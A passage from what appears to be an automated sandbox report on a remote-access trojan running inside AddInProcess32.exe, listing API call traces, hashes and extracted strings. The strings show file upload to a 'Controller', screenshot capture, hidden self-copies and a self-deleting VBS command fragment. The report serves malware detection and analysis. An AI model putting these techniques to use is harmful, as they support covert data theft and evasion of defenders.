                                                                                                        • WriteFile.KERNEL32(00000000,?,00000002,00000000,00000000), ref: 00401D11
                                                                                                        • WriteFile.KERNEL32(00000000,00471B0E,00000002,00000000,00000000), ref: 00401D22
                                                                                                        • WriteFile.KERNEL32(00000000,data,00000004,00000000,00000000), ref: 00401D32
                                                                                                        • WriteFile.KERNEL32(00000000,?,00000004,00000000,00000000), ref: 00401D42
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$Write$Create
                                                                                                        • String ID: RIFF$WAVE$data$fmt
                                                                                                        • API String ID: 1602526932-4212202414
                                                                                                        • Opcode ID: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                        • Instruction ID: 129ba3454a43ec42bedb537cb07bfa8f9eb5569c2d2d4c431363fc199bcfbd5c
                                                                                                        • Opcode Fuzzy Hash: 78ad8e7e5bc68969d37ee031f4dc22a1157de1b6325161424f695ba0fa01d69c
                                                                                                        • Instruction Fuzzy Hash: 66416F726443187AE210DB51DD86FBB7EECEB85F54F40081AFA44D6090E7A4E909DBB3
                                                                                                        Function 004064E0 Relevance: 35.1, APIs: 12, Strings: 8, Instructions: 62libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlInitUnicodeString,00000000,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000001,004068B2,C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000003,004068DA,004742E0,00406933), ref: 004064F4
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004064FD
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtAllocateVirtualMemory), ref: 0040650E
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406511
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,NtFreeVirtualMemory), ref: 00406522
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406525
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlAcquirePebLock), ref: 00406536
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406539
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,RtlReleasePebLock), ref: 0040654A
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0040654D
                                                                                                        • GetModuleHandleW.KERNEL32(ntdll.dll,LdrEnumerateLoadedModules), ref: 0040655E
                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00406561
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                        • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$LdrEnumerateLoadedModules$NtAllocateVirtualMemory$NtFreeVirtualMemory$RtlAcquirePebLock$RtlInitUnicodeString$RtlReleasePebLock$ntdll.dll
                                                                                                        • API String ID: 1646373207-4283035339
                                                                                                        • Opcode ID: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                        • Instruction ID: b313d74494c875c8407327c43f2905d2eb3972c2d2e01a1e2b33da4df8ba43a1
                                                                                                        • Opcode Fuzzy Hash: 4215aa750f6926a1b4092da29332a0681cdff8c3ca49fe138229b5bb5280378e
                                                                                                        • Instruction Fuzzy Hash: 1F011EA4E40B1675DB21677A7C54D176EAC9E502917190433B40AF22B1FEBCD410CD7D
                                                                                                        Function 0040BC67 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 203fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _wcslen.LIBCMT ref: 0040BC75
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe,00000000,0000000E), ref: 0040BC8E
                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000,00000000,00000000,00000000,?,00474358,0000000E,00000027,0000000D,00000033,00000000,00000032,00000000,Exe), ref: 0040BD3E
                                                                                                        • _wcslen.LIBCMT ref: 0040BD54
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 0040BDDC
                                                                                                        • CopyFileW.KERNEL32(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe,00000000,00000000), ref: 0040BDF2
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE31
                                                                                                        • _wcslen.LIBCMT ref: 0040BE34
                                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BE4B
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00474358,0000000E), ref: 0040BE9B
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000001), ref: 0040BEB9
                                                                                                        • ExitProcess.KERNEL32 ref: 0040BED0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$_wcslen$AttributesCopyCreateDirectory$CloseExecuteExitHandleProcessShell
                                                                                                        • String ID: 6$C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe$del$open$BG$BG
                                                                                                        • API String ID: 1579085052-2696236988
                                                                                                        • Opcode ID: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                        • Instruction ID: b3868b96a5a73c1b880f625a38b4c220dd420420d05b0a2cc1e840e3cd02b35d
                                                                                                        • Opcode Fuzzy Hash: 5810891c7d77c7b93cc386c5bda24951b24e135575458cac5ec9797dffa7e349
                                                                                                        • Instruction Fuzzy Hash: D251B0212043406BD609B722EC52EBF77999F81719F10443FF985A66E2DF3CAD4582EE
                                                                                                        Function 0041B1BB Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 139stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B1D6
                                                                                                        • _memcmp.LIBVCRUNTIME ref: 0041B1EE
                                                                                                        • lstrlenW.KERNEL32(?), ref: 0041B207
                                                                                                        • FindFirstVolumeW.KERNEL32(?,00000104,?), ref: 0041B242
                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 0041B255
                                                                                                        • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 0041B299
                                                                                                        • lstrcmpW.KERNEL32(?,?), ref: 0041B2B4
                                                                                                        • FindNextVolumeW.KERNEL32(?,0000003F,00000104), ref: 0041B2CC
                                                                                                        • _wcslen.LIBCMT ref: 0041B2DB
                                                                                                        • FindVolumeClose.KERNEL32(?), ref: 0041B2FB
                                                                                                        • GetLastError.KERNEL32 ref: 0041B313
                                                                                                        • GetVolumePathNamesForVolumeNameW.KERNEL32(?,?,?,?), ref: 0041B340
                                                                                                        • lstrcatW.KERNEL32(?,?), ref: 0041B359
                                                                                                        • lstrcpyW.KERNEL32(?,?), ref: 0041B368
                                                                                                        • GetLastError.KERNEL32 ref: 0041B370
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Volume$ErrorFindLast$lstrlen$CloseDeviceFirstNameNamesNextPathQuery_memcmp_wcslenlstrcatlstrcmplstrcpy
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 3941738427-1684325040
                                                                                                        • Opcode ID: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                        • Instruction ID: 2e0df54dd889987763cd5022c3700ac4418931210c184d5857636408485aa128
                                                                                                        • Opcode Fuzzy Hash: 17f0383a2199e65fad79c02efdfd6f833a281a6f5bd6be27e9a359bd3f4b92bf
                                                                                                        • Instruction Fuzzy Hash: 8B416F71508305AAD7209FA1EC8C9EBB7E8EB49715F00096BF541C2261EB78C98887D6
                                                                                                        Function 0044E20E Relevance: 25.9, APIs: 17, Instructions: 419COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$EnvironmentVariable$_wcschr
                                                                                                        • String ID:
                                                                                                        • API String ID: 3899193279-0
                                                                                                        • Opcode ID: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                        • Instruction ID: 8ac3cd9939a067627e1c481289c57a7f9f94b657261427fab31af25724b0c78e
                                                                                                        • Opcode Fuzzy Hash: 51f39d1eed0bb0b4e5b8ce655fdeab7d9d24a3419ebedca0ef41db0feeddc4a5
                                                                                                        • Instruction Fuzzy Hash: 96D13C719007007FFB25AF7B9881A6F7BA4BF02314F0541AFF905A7381E63989418B9D
                                                                                                        Function 00411C81 Relevance: 25.0, APIs: 9, Strings: 5, Instructions: 479sleepfileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00411C9A
                                                                                                          • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,771B3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32(00403AB9,?,?,00403AB9,00465324), ref: 004176CC
                                                                                                          • Part of subcall function 004176B6: CloseHandle.KERNEL32($SF,?,?,00403AB9,00465324), ref: 004176D5
                                                                                                        • Sleep.KERNEL32(0000000A,00465324), ref: 00411DEC
                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324), ref: 00411E8E
                                                                                                        • Sleep.KERNEL32(0000000A,00465324,00465324,00465324), ref: 00411F30
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411F91
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00411FC8
                                                                                                        • DeleteFileW.KERNEL32(00000000,00465324,00465324,00465324), ref: 00412004
                                                                                                        • Sleep.KERNEL32(000001F4,00465324,00465324,00465324), ref: 0041201E
                                                                                                        • Sleep.KERNEL32(00000064), ref: 00412060
                                                                                                          • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$File$Delete$CloseHandle$CurrentModuleNameProcesssend
                                                                                                        • String ID: /stext "$HDG$HDG$>G$>G
                                                                                                        • API String ID: 1223786279-3931108886
                                                                                                        • Opcode ID: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                        • Instruction ID: 1febf249a593eb43810efab42e14b6693ac358e03ba90545e56d33427da79e18
                                                                                                        • Opcode Fuzzy Hash: 951e407a7335b9e0a56f91841e3e4d0ffd1770d323d9a5522bd6a3f544b0dece
                                                                                                        • Instruction Fuzzy Hash: 960243315083414AC325FB61D891AEFB7D5AFD4308F50493FF88A931E2EF785A49C69A
                                                                                                        Function 00413E37 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 109libraryloaderCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                        • LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                        • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                        • GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00413F66
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Library$AddressFreeProc$Load$DirectorySystem
                                                                                                        • String ID: \ws2_32$\wship6$freeaddrinfo$getaddrinfo$getnameinfo
                                                                                                        • API String ID: 2490988753-744132762
                                                                                                        • Opcode ID: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                        • Instruction ID: a4547f3d416e9253f7b1cbdd0907a67efdadb69b2b53743d1710677937ed8fa2
                                                                                                        • Opcode Fuzzy Hash: ba6e91efba9758633ea9bec27d31a254a4df24d425156724d9bfa6bc4db7eb59
                                                                                                        • Instruction Fuzzy Hash: 6D31C4B1906315A7D320AF25DC44ACBB7ECEF44745F400A2AF844D3201D778DA858AEE
                                                                                                        Function 0041B824 Relevance: 23.0, APIs: 6, Strings: 7, Instructions: 214registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 0041B846
                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 0041B88A
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 0041BB54
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseEnumOpen
                                                                                                        • String ID: DisplayName$DisplayVersion$InstallDate$InstallLocation$Publisher$Software\Microsoft\Windows\CurrentVersion\Uninstall$UninstallString
                                                                                                        • API String ID: 1332880857-3714951968
                                                                                                        • Opcode ID: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                        • Instruction ID: 4ca6cd9db44c7b11bab16217f2b7ba144dfc64e74838f3250c32f9e768a6938f
                                                                                                        • Opcode Fuzzy Hash: 6f9d8f0674dc0a37181ba86e51d6a92751e66a7c9b2afbb440473ff198e35625
                                                                                                        • Instruction Fuzzy Hash: 8C812E311082449BD324EB11DC51AEFB7E9FFD4314F10493FB58A921E1EF74AA49CA9A
                                                                                                        Function 0041CA9E Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • DefWindowProcA.USER32(?,00000401,?,?), ref: 0041CAE9
                                                                                                        • GetCursorPos.USER32(?), ref: 0041CAF8
                                                                                                        • SetForegroundWindow.USER32(?), ref: 0041CB01
                                                                                                        • TrackPopupMenu.USER32(00000000,?,?,00000000,?,00000000), ref: 0041CB1B
                                                                                                        • Shell_NotifyIconA.SHELL32(00000002,00473B50), ref: 0041CB6C
                                                                                                        • ExitProcess.KERNEL32 ref: 0041CB74
                                                                                                        • CreatePopupMenu.USER32 ref: 0041CB7A
                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000000,Close), ref: 0041CB8F
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyProcProcessShell_Track
                                                                                                        • String ID: Close
                                                                                                        • API String ID: 1657328048-3535843008
                                                                                                        • Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                        • Instruction ID: a66ed96c0d91d71762f770de87d5f41dd37c70c4e97b210e23d221b2b7ccacbc
                                                                                                        • Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
                                                                                                        • Instruction Fuzzy Hash: 68212B71188209FFDB064F64FD4EAAA3F65EB04342F044135B906D40B2D7B9EA90EB18
                                                                                                        Function 00444F3D Relevance: 22.8, APIs: 15, Instructions: 296COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$Info
                                                                                                        • String ID:
                                                                                                        • API String ID: 2509303402-0
                                                                                                        • Opcode ID: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                        • Instruction ID: 0af7f9009007d8880989bd470fdb3e4a62bb8e65dbd2af1b74ff5c8893cb1db7
                                                                                                        • Opcode Fuzzy Hash: 9077060aec37fc2a24c06225c8e3d33544530eed784cb91a0a423b34aeaed2a1
                                                                                                        • Instruction Fuzzy Hash: D0B18F71900605AFEF11DFA9C881BEEBBF4BF49304F14406EF855B7242DA79A8458B64
                                                                                                        Function 00407DEF Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 325fileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,000000B6), ref: 00407F4C
                                                                                                        • GetFileSizeEx.KERNEL32(00000000,00000000), ref: 00407FC2
                                                                                                        • __aulldiv.LIBCMT ref: 00407FE9
                                                                                                        • SetFilePointerEx.KERNEL32(00000000,?,?,00000000,00000000), ref: 0040810D
                                                                                                        • ReadFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00408128
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408200
                                                                                                        • CloseHandle.KERNEL32(00000000,00000052,00000000,?), ref: 0040821A
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00408256
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: File$CloseHandle$CreatePointerReadSize__aulldiv
                                                                                                        • String ID: ReadFile error$SetFilePointerEx error$Uploading file to Controller: $>G
                                                                                                        • API String ID: 1884690901-3066803209
                                                                                                        • Opcode ID: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                        • Instruction ID: 222450ca6543349723abdfa1177da379b39b5876d7444fbb960ea0ab75079841
                                                                                                        • Opcode Fuzzy Hash: 88ea97f44c53fbd348cf9e53321a401212c3e6164c9f36926d15b5b173278924
                                                                                                        • Instruction Fuzzy Hash: DAB191316083409BC214FB25C892AAFB7E5AFD4314F40492EF885632D2EF789945C79B
                                                                                                        Function 0045006D Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • ___free_lconv_mon.LIBCMT ref: 004500B1
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F300
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F312
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F324
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F336
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F348
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F35A
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F36C
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F37E
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F390
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3A2
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3B4
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3C6
                                                                                                          • Part of subcall function 0044F2E3: _free.LIBCMT ref: 0044F3D8
                                                                                                        • _free.LIBCMT ref: 004500A6
                                                                                                          • Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
                                                                                                          • Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED
                                                                                                        • _free.LIBCMT ref: 004500C8
                                                                                                        • _free.LIBCMT ref: 004500DD
                                                                                                        • _free.LIBCMT ref: 004500E8
                                                                                                        • _free.LIBCMT ref: 0045010A
                                                                                                        • _free.LIBCMT ref: 0045011D
                                                                                                        • _free.LIBCMT ref: 0045012B
                                                                                                        • _free.LIBCMT ref: 00450136
                                                                                                        • _free.LIBCMT ref: 0045016E
                                                                                                        • _free.LIBCMT ref: 00450175
                                                                                                        • _free.LIBCMT ref: 00450192
                                                                                                        • _free.LIBCMT ref: 004501AA
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                        • String ID:
                                                                                                        • API String ID: 161543041-0
                                                                                                        • Opcode ID: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                        • Instruction ID: 6df0fc8d0da410edbfddc8482cd9dc810a80ebbb5b2f86b8c24a0bb33e3d08c7
                                                                                                        • Opcode Fuzzy Hash: bcc467a133590e08c2246ffecdc9577bb20b6303625806e8b1892e2aaa35b24d
                                                                                                        • Instruction Fuzzy Hash: 96317235500B00AFEB20AA35D845B5B73E5AF42355F15841FF849E7292DF39AC98CB1A
                                                                                                        Function 00419128 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 174sleeptimeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __EH_prolog.LIBCMT ref: 0041912D
                                                                                                        • GdiplusStartup.GDIPLUS(00473AF0,?,00000000), ref: 0041915F
                                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
                                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041926D
                                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041927C
                                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                                        • String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
                                                                                                        • API String ID: 489098229-65789007
                                                                                                        • Opcode ID: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                        • Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
                                                                                                        • Opcode Fuzzy Hash: 44793622330fde52a2f30c6cdcdb0a3b072200039cd4f36984e96f4569c3285d
                                                                                                        • Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799
                                                                                                        Function 0040C66D Relevance: 19.4, APIs: 3, Strings: 8, Instructions: 147COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                          • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040C6C7
                                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C826
                                                                                                        • ExitProcess.KERNEL32 ref: 0040C832
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                                        • String ID: """, 0$.vbs$@CG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                                        • API String ID: 1913171305-390638927
                                                                                                        • Opcode ID: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                        • Instruction ID: a795a6540db69397e2c5d2b70f340dd787df27bacd58b350937fb1c0aad7b7c4
                                                                                                        • Opcode Fuzzy Hash: 55bb4ee7066f8aebb67eba3c7e5c5b5a3aff5d198cab0c6ae93ac72ca68ce97f
                                                                                                        • Instruction Fuzzy Hash: A2416D329001185ACB14F762DC56DFE7779AF50718F50417FF906B30E2EE386A8ACA99
                                                                                                        Function 0044F3E1 Relevance: 18.4, APIs: 12, Instructions: 376COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000F.00000002.2553029696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_15_2_400000_AddInProcess32.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _free
                                                                                                        • String ID:
                                                                                                        • API String ID: 269201875-0
                                                                                                        • Opcode ID: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
                                                                                                        • Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
                                                                                                        • Opcode Fuzzy Hash: 53d41fd9a7ee4e2989e4925aa528ca2cb03ad0a377c341b032d8e4e6b559b5a3
